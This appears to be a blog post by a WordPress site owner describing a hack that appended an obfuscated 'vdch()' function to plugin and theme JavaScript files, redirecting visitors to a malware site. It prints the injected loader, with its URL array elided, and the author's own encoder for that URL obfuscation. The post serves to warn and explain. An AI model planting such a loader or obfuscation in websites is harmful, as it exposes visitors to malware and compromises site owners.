I got an email today asking me for support. One of my WordPress setups had been reported to be hacked – resulting in a JavaScript redirect to a site distributing malware.
Searching for the hack itself or the redirect I couldn’t find anything useful (except for an entry in the Google support forum).
Every JavaScript file in wp-content/plugins and wp-content/themes was infected with a function added to the bottom of the script: “function vdch()”. Make sure your blogs are clean.
Update: As I just read in this forum, on stackoverflow and on wordpress, they seem to compromise php and html files too. I guess in my case they couldn’t by exploiting the WordPress vulnerability because its built-in editor only allows you to edit plugins and themes.
This is the script they’ve been using on the setup I had to clean up. It fails in Firefox but seems to run fine in Chrome.
function vdch() { if(document.all.length > 3) { var t = new Array(...); var dchid = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") dchid += String.fromCharCode( parseInt(c_clr,16)^i); } } var dch = document.createElement("script"); dch.id = "dchid"; dch.src = dchid; document.all[3].appendChild(dch); } else { setTimeout("vdch()",500); } } setTimeout("vdch()",500);
Update 2: I was curious about how the string (=URL) encryption works in the script above. Here’s the function I came up with. Pretty nice idea (never had a look at JavaScript obfuscation before).
var url = "http://your.url/"; var enc = new Array(); var rgb = "#"; for (i = 0, j = 2; i < url.length; i++, j += 2) { rgb += (url.charCodeAt(i)^j).toString(16); if (j == 6) { j = 0; enc.push(rgb); rgb = "#"; } }